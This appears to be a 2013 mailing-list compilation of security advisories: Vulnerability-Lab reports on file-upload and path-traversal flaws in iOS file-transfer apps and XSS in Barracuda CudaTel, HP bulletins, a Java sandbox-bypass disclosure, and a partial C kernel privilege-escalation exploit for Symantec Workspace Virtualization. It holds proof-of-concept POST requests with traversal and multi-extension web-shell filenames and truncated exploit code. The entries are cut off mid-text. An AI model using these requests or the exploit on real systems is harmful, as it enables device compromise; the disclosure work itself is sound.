WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities
Title: == WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities Date: = 2013-07-15 References: === http://www.vulnerability-lab.com/get_content.php?id=1011 VL-ID: = 1011 Common Vulnerability Scoring System: 6.3 Introduction: = It is the best solution for transferring photos, songs, documents, movies and other files between computer and your mobile devices over wireless network. Simply launch application on your iOS device and scan QR code from http://wifly.me to connect your phone. Drop your files into opened page and vice versa! No cloud or internet access required - no data leaves your local network. Both your devices must have access to the same LAN or WLAN - no additional network configurations needed. Transferred documents can be opened with any supported App on your iOS device. Capabilities:#8232; - Multiple uploads#8232; - Easily Drag Drop multiple files to WiFly#8232; - Preview pictures in the browser - Downloading the entire folder to your computer#8232; - Browsing files and folders directly on mobile device#8232; - Exchange files between mobile devices - Built in preview of images, documents, music and video files (Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the WiFly 1.0 Pro application (Apple iOS - iPad iPhone). Report-Timeline: 2013-07-15:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Apple AppStore Product: WiFly Pro 1.0 Exploitation-Technique: === Remote Severity: = High Details: A local file include and arbitrary file upload web vulnerability is detected in the WiFly 1.0 Pro application (Apple iOS - iPad iPhone). The vulnerabilities are located in the file upload module of the web-server (http://localhost:4885/) when processing to request via POST a manipulated filename. The injected file will be accessable via the index listing module of the application. Remote attackers can exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php, js, html codes. The filter in the application itself disallow to rename a file with special chars because of a input field restriction. Attackers need to request 2 different urls. First the file as url with a parameter of the filename inside to display and as secound step the file will be uploaded with the manipulated filename in the POST request. Exploitation of the vulnerability requires no user interaction but the victim iOS device needs to accept the other device connection. Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload. Vulnerable Application(s): [+] WiFly Pro 1.0 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Upload Vulnerable File(s): [+] upload.json add Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index Listing (http://localhost:4885/) Proof of Concept: = The local file/path include and arbitrary file upload vulnerability can be exploited by remote attackers without user interaction but the connection needs to be accepted by the target system. For demonstration or reproduce ... Standard Request: Content-Disposition: form-data; name=files[]; filename=s2.png\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n Status: 200 POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0size=53025last_modified=1331091664536000name=new-image23.pngsessionid=1373658611109 Load Flags[LOAD_BYPASS_CACHE ] Content Size[118] Mime Type[application/x-unknown-content-type] PoC: 1.1 - File/Path Include Vulnerability POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0size=53025; last_modified=1331091664536000name=../../[File/Path Include Vulnerability!].pngsessionid=1373658611109 POST_DATA[-27213192708057 Content-Disposition: form-data; name=files[]; filename=../../[File/Path Include Vulnerability!] Content-Type: image/png PoC: 1.2 - Arbitrary File Upload Vulnerability POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0size=53025; last_modified=1331091664536000name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.jssessionid=1373658611109 POST_DATA[-27213192708057 Content-Disposition: form-data; name=files[]; filename=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js Content-Type: image/png Solution:
Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability
Title: == Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability Date: = 2013-07-16 References: === http://www.vulnerability-lab.com/get_content.php?id=1013 VL-ID: = 1013 Common Vulnerability Scoring System: 7.5 Introduction: = With `Flux Player` you can use your iPhone, iPad or iPod touch for download, transfer and playback of movies, audio books and music. The movies may be from transferred from commercial services, products or alternatively from yourself by drag-and-drop with the free `Flux Transfer` PC application. (Copy of the Vendor Homepage: https://itunes.apple.com/en/app/flux-player/id324300572 ) Abstract: = The Vulnerability Laboratory Research Team discovered a file include arbitrary file upload vulnerability in the Flux Player 3.1.0 (Apple iOS - iPad iPhone). Report-Timeline: 2013-07-16:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Apple AppStore Product: Flux Player - Application 3.1.0 Exploitation-Technique: === Remote Severity: = High Details: 1.1 A file include web vulnerability is detected in the Flux Player 3.1.0 Application (Apple iOS - iPad iPhone). The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service. The vulnerability is located in the upload module when processing to upload files with manipulated names via POST method. The attacker can inject local path or files to request context and compromise the device. The validation has a bad side effect which impacts the risk to combine the attack with persistent injected script code. Exploitation of the vulnerability requires no user interaction or privilege flux player application user account. Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the device or application. Vulnerable Module(s): [+] Upload (Files) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing 1.2 An arbitrary file upload web vulnerability is detected in the Flux Player 3.1.0 Application (Apple iOS - iPad iPhone). The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access. The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. Attackers are able to upload a php or js web-shells by renaming the file with multiple extensions. He uploads for example a web-shell with the following name and extension picture.jpg.js.php.jpg . He deletes in the request after the upload the jpg to access unauthorized the malicious file (web-shell) to compromise the web-server or mobile device. Exploitation of the vulnerability requires no user interaction or privilege flux player application user account. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. Vulnerable Module(s): [+] Upload (Files) Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] Index File Dir Listing Proof of Concept: = The local file include and arbitary file upload vulnerability can be exploited by remote attackers without privilege application user account and also without user interaction. For demonstration or reproduce ... 1.1 --- Request Session Log 1 - Local File Include --- Status: 200[OK] POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1053] Mime Type[application/x-unknown-content-type] Request Headers: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:8080/] Connection[keep-alive] Post Data: POST_DATA[-21961286324572 Content-Disposition: form-data; name=file; filename=iframe src=aiframe src=var/app/Mobile Content-Type: image/png - -- Status: 200[OK] GET http://localhost:8080/../var/app/Mobile [Included File/Path as Filename!] Load Flags[LOAD_DOCUMENT_URI ] Content Size[669] Mime Type[application/x-unknown- content-type] Request Headers: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept
Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)
Title: == Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17) Date: = 2013-07-17 References: === http://vulnerability-lab.com/get_content.php?id=779 BARRACUDA NETWORK SECURITY ID: BNSEC-815 VL-ID: = 779 Common Vulnerability Scoring System: 2.5 Introduction: = Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.cudatel.com ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple client side web vulnerabilities in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: 2012-11-26: Researcher Notification Coordination (Benjamin Kunz Mejri) 2012-11-29: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) 2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team) 2013-04-07: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow] 2012-07-17: Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple client side input validation vulnerabilities are detected in Barracuda Networks CudaTel v2.6.002.040 appliance application. The non-persistent vulnerabilities allows an attacker (remote) to manipulate client side application to browser requests. The first vulnerability (client side) is located in the gui route module when processing to request the vulnerable bbx_outbound_route_name parameter affected listing. The route module allows remote attackers via bbx_outbound_route_flag_locked parameter to request and execute script codes in the bbx_outbound_route_name listing. The secound vulnerability (client side) is located in the ajax - html module when processing to request the vulnerable queues_wall_stub file and the ops opOpenQueueWallboard link parameters. The vulnerability allows remote attackers (client side) to change the link of the Queue Monitor Board on requests to redirect. The third vulnerability (client side) is located in the Web login attempt fail exception-handling of eventlog module when processing to load the manipulated bbx_eventlog_message parameter. The vulnerability allows remote attackers to execute own script code (client side) in the queues_wall_stub.html file from the exception-handling location for Web login attempt fails. Exploitation of the vulnerability requires a low privilege application user account and medium or high user interaction. Successful exploitation of the vulnerabilities result in client side phishing, client side session hijacking, client side external redirects to malware or evil websites and client side module context manipulation. Vulnerable Section(s): [+] GUI - ROUTE [+] AJAX - HTML [+] Eventlog Vulnerable Module(s): [+] route - Listing [+] queues_wall_stub - Monitor Queue Link [+] eventlog - Web login attempt fail (Exception Handling) - Listing Vulnerable Parameter(s): [+] bbx_outbound_route_flag_locked bbx_outbound_route_name [+] ops opOpenQueueWallboard [+] bbx_eventlog_message Proof of Concept: = The client side input validation vulnerabilities can be exploited by remote attackers without required application user account and with medium or high required user interaction. For demonstration or reproduce ... 1.1 Review: GUI - ROUTE route - Listing bbx_outbound_route_flag_locked [PARAMETER] bbx_outbound_route_name [LISTING] - bbx_domain_id: 6 bbx_outbound_route_flag_locked: 0 bbx_outbound_route_id: 14
[security bulletin] HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03825537 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03825537 Version: 2 HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-17 Last Updated: 2013-07-17 Potential Security Impact: Remote unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with the HP StoreVirtual Storage. This vulnerability could be remotely exploited to gain unauthorized access to the device. All HP StoreVirtual Storage systems are equipped with a mechanism that allows HP support to access the underlying operating system if permission and access is provided by the customer. This functionality cannot be disabled today. HP StoreVirtual products are storage appliances that use a custom operating system, LeftHand OS, which is not accessible to the end user. Limited access is available to the user via the HP StoreVirtual Command-Line Interface (CLiQ) however root access is blocked. Root access may be requested by HP Support in some cases to help customers resolve complex support issues. To facilitate these cases, a challenge-response-based one-time password utility is employed by HP Support to gain root access to systems when the customer has granted permission and network access to the system. The one-time password utility protects the root access by preventing repeated access to the system with the same pass phrase. Root access to the LeftHand OS does not provide access to the user data being stored on the system. References: CVE-2013-2352 (SSRT101257) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. This issue effects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and earlier. HP StoreVirtual device HP P4300 HP P4500 HP P4300 G2 HP P4500 G2 HP P4800 G2 HP P4900 G2 HP P4000 VSA HP StoreVirtual 4130 HP StoreVirtual 4330 HP StoreVirtual 4530 HP StoreVirtual 4630 HP StoreVirtual 4730 HP StoreVirtual VSA LeftHand NSM2060 LeftHand NSM2120 Dell PowerEdge 2950 HP DL320S IBM System x3650 LeftHand NSM2060 G2 LeftHand NSM2120 G2 LeftHand VSA BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2013-2352(AV:N/AC:L/Au:N/C:N/I:C/A:C) 9.4 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-al...@hp.com RESOLUTION HP has provided patches to resolve this vulnerability. Please see the table below to determine which patch applies to the StoreVirtual version being used. OS Version Patch HP LeftHand OS version 10.5 10152-00 HP LeftHand OS version 10.0 10151-00 HP P4000 SAN/iQ software versions 9.5 and 9.5.01 25051-00 Note: Systems running HP P4000 SAN/iQ version 9.5.x must install 9.5 Patch Set 05 before applying patch 25051-00. Installation of patch 25051-00 will fail if 9.5 Patch Set 05 is not present Note: HP Support may still request root access to customer systems in order to resolve certain support issues. Patches and release notes may be downloaded using the 9.5 or later CMC. Go to http://www.hp.com/go/hpsc Select your specific product. One method to do this is as follows: Under Browse all HP products, select 'Storage' Select 'Disk Storage Systems' Select 'StoreVirtual Storage' Select 'HP StoreVirtual 4000/LeftHand P4000 Storage' If you have a HP LeftHand VSA, HP LeftHand P4300 or HP LeftHand P4500 product, select 'HP LeftHand P4000 SAN Solutions'. If you have a HP P4x00 G2 or HP StoreVirtual 4000 product select 'HP StoreVirtual 4000 Storage'. Select 'Drivers, Software Firmware' under 'Download Options' in the left menu. Select your specific product. Select your language. Click 'Cross operating system (BIOS, Firmware, Diagnostics, etc.)' Click 'Patch' or scroll down to the Patch table j. In the Description column of the Patch table, click the title of the patch: To download the file, click the 'Download' button. To read the release notes, click the 'Release Notes' tab. HISTORY Version:1 (rev.1) - 9 July 2013 Initial release Version:2 (rev.2) - 17 July 2013 Documented the released patches, added LeftHand NSM2120 Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support
[SE-2012-01] New Reflection API affected by a known 10+ years old attack
Hello All, We discovered yet another indication that new Reflection API introduced into Java SE 7 was not a subject to a thorough security review (if any). A new vulnerability (Issue 69) that was submitted to Oracle today makes it possible to implement a very classic attack against Java VM. What's in particular interesting is that the attack itself has been in the public knowledge for at least 10+ years [1]. It's one of those risks one should protect against in the first place when new features are added to Java at the core VM level. The more surprising it is to discover that Reflection API introduced to Java SE 7 didn’t implement proper protection against this attack. Our Proof of Concept code for Issue 69 was confirmed to work with flying colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code allows to violate a fundamental feature of Java VM security - the safety of its type system. As a result, a complete and reliable Java security sandbox bypass can be gained on a vulnerable instance of Oracle's Java SE software. Oracle's blog post published on May 30, 2013 [2] implies that maintaining the security-worthiness of Java has been Oracle’s priority following the acquisition of Sun Microsystems. Oracle's VP goes even further by indicating that acquired product lines [such as Java SE] were required to conform to Oracle policies and procedures, including those comprising Oracle Software Security Assurance [3]. If Oracle had any Software Security Assurance procedures adopted for Java SE, most of simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect. That thought alone should catch attention of Oracle customers not necessarily relying on Java SE, but rather on other Oracle products, which were likely the subject to the very same, questionable Software Security Assurance policies and procedures as Java SE 7. -- As for other things, we released technical details and Proof of Concept code for a previously reported security vulnerability (Issue 61) that got fixed by Oracle's Java SE CPU in Jun 2013: http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf http://www.security-explorations.com/materials/se-2012-01-61.zip We also released technical details and Proof of Concept codes for several (9 in total) IBM Java flaws that were addressed by the company in early Jul 2013: http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf http://www.security-explorations.com/materials/se-2012-01-62-68.zip The above includes details of trivially broken fixes for vulnerabilities reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is also a nice illustration of the allowed behavior (Issue 54) for other than Oracle's Java VM implementations. Finally, we published information (and some comment) about CVE numbers assigned by Oracle to vulnerabilities reported by Security Explorations as part of SE-2012-01 project: http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf Thank you. Best Regards Adam Gowdiak - Security Explorations http://www.security-explorations.com We bring security research to the new level - References: [1] Java and Java VM security vulnerabilities and their exploitation techniques, Last Stage of Delirium Research Group, http://lsd-pl.net/ [2] Maintaining the security-worthiness of Java is Oracle’s priority https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of [3] Oracle Software Security Assurance http://www.oracle.com/us/support/assurance/overview/index.html
Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit
# Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit # Date: 2013-7-17 # Author : MJ0011 # Version: Symantec Workspace Virtualization 6.4.1895.0 # Tested on: Windows XP SP3 DETAILS: In fslx.sys 's hook function of NtQueryValueKey , it directly write to the buffer of ResultLength without any check EXPLOIT CODE: #include stdafx.h #include windows.h typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; typedef UNICODE_STRING *PUNICODE_STRING; typedef const UNICODE_STRING *PCUNICODE_STRING; typedef LONG (WINAPI *pNtQueryValueKey)( HANDLE KeyHandle, PUNICODE_STRING ValueName, ULONG KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength ); typedef LONG (WINAPI *pNtQueryIntervalProfile )( ULONG ProfileSource, PULONG Interval ); typedef LONG (WINAPI *pZwQuerySystemInformation) ( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); #include malloc.h PVOID GetInfoTable(ULONG ATableType) { ULONG mSize = 0x4000; PVOID mPtr = NULL; LONG status; HMODULE hlib = GetModuleHandle(ntdll.dll); pZwQuerySystemInformation ZwQuerySystemInformation = (pZwQuerySystemInformation)GetProcAddress(hlib , ZwQuerySystemInformation); do { mPtr = malloc(mSize); if (mPtr) { status = ZwQuerySystemInformation(ATableType , mPtr , mSize , 0 ); } else { return NULL; } if (status == 0xc004) { free(mPtr); mSize = mSize * 2; } } while (status == 0xc004); if (status == 0) { return mPtr; } free(mPtr); return NULL; } enum { SystemModuleInformation = 11, SystemHandleInformation = 16 }; typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHARImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID); typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID); typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)( ULONG x1, ULONG y1, ULONG x2, ULONG y2, ULONG color ); typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)( ULONG Color ); typedef VOID (*INBV_DISPLAY_STRING_FILTER)( PUCHAR *Str ); typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)( INBV_DISPLAY_STRING_FILTER DisplayStringFilter ); typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)( BOOLEAN bEnable ); typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)( ULONG x1, ULONG y1, ULONG x2, ULONG y2 ); typedef VOID (WINAPI *PINBV_DISPLAY_STRING)( PUCHAR Str ); PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ; PINBV_RESET_DISPLAY InbvResetDisplay = 0 ; PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ; PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ; PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ; PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ; PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ; PINBV_DISPLAY_STRING InbvDisplayString= 0 ; #define VGA_COLOR_BLACK 0 #define VGA_COLOR_RED 1 #define VGA_COLOR_GREEN 2 #define VGA_COLOR_GR 3 #define VGA_COLOR_BULE 4 #define VGA_COLOR_DARK_MEGAENTA 5 #define VGA_COLOR_TURQUOISE 6 #define VGA_COLOR_GRAY 7 #define VGA_COLOR_BRIGHT_GRAY 8 #define VGA_COLOR_BRIGHT_RED 9 #define VGA_COLOR_BRIGHT_GREEN 10 #define VGA_COLOR_BRIGHT_YELLOW 11 #define VGA_COLOR_BRIGHT_BULE 12 #define VGA_COLOR_BRIGHT_PURPLE 13 #define VGA_COLOR_BRIGHT_TURQUOISE 14 #define VGA_COLOR_WHITE 15 UCHAR DisplayString[] = = EXPLOIT SUCCESSFULLY Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit VULNERABLE
[security bulletin] HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03839862 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03839862 Version: 1 HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-18 Last Updated: 2013-07-18 Potential Security Impact: Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain extended privileges, disclosure of information, unauthorized access, XSS Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain privileges, disclosure of information, unauthorized access, or XSS. References: CVE-2011-3389 (SSRT100740) Remote disclosure of information CVE-2012-0883 (SSRT101209) Remote gain extended privileges CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS) CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS) CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS) CVE-2013-2355 (SSRT100696) Remote unauthorized Access CVE-2013-2356 (SSRT100835) Remote disclosure of information CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2361 (SSRT101007) XSS CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS) CVE-2013-2363 (SSRT101150) Remote disclosure of information CVE-2013-2364 (SSRT101151) XSS CVE-2013-5217 (SSRT101137) Remote unauthorized access SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and Windows. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-3389(AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0883(AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2110(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2311(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2329(AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-2335(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2336(AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2355(AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-2356(AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8 CVE-2013-2357(AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2358(AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2359(AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2360(AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2361(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2362(AV:L/AC:H/Au:S/C:N/I:N/A:P) 1.0 CVE-2013-2363(AV:N/AC:H/Au:N/C:C/I:N/A:P) 6.1 CVE-2013-2364(AV:N/AC:L/Au:S/C:N/I:N/A:P) 4.0 CVE-2013-5217(AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks agix for working with the TippingPoint Zero Day Initiative to report vulnerability CVE-2013-2362 to security-al...@hp.com RESOLUTION HP has made System Management Homepage (SMH) v7.2.1 or subsequent available for Windows and Linux to resolve the vulnerabilities. Information and updates for SMH can be found at the following location: http://h18013.www1.hp.com/products/servers/management/agents/index.html HISTORY Version:1 (rev.1) - 18 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is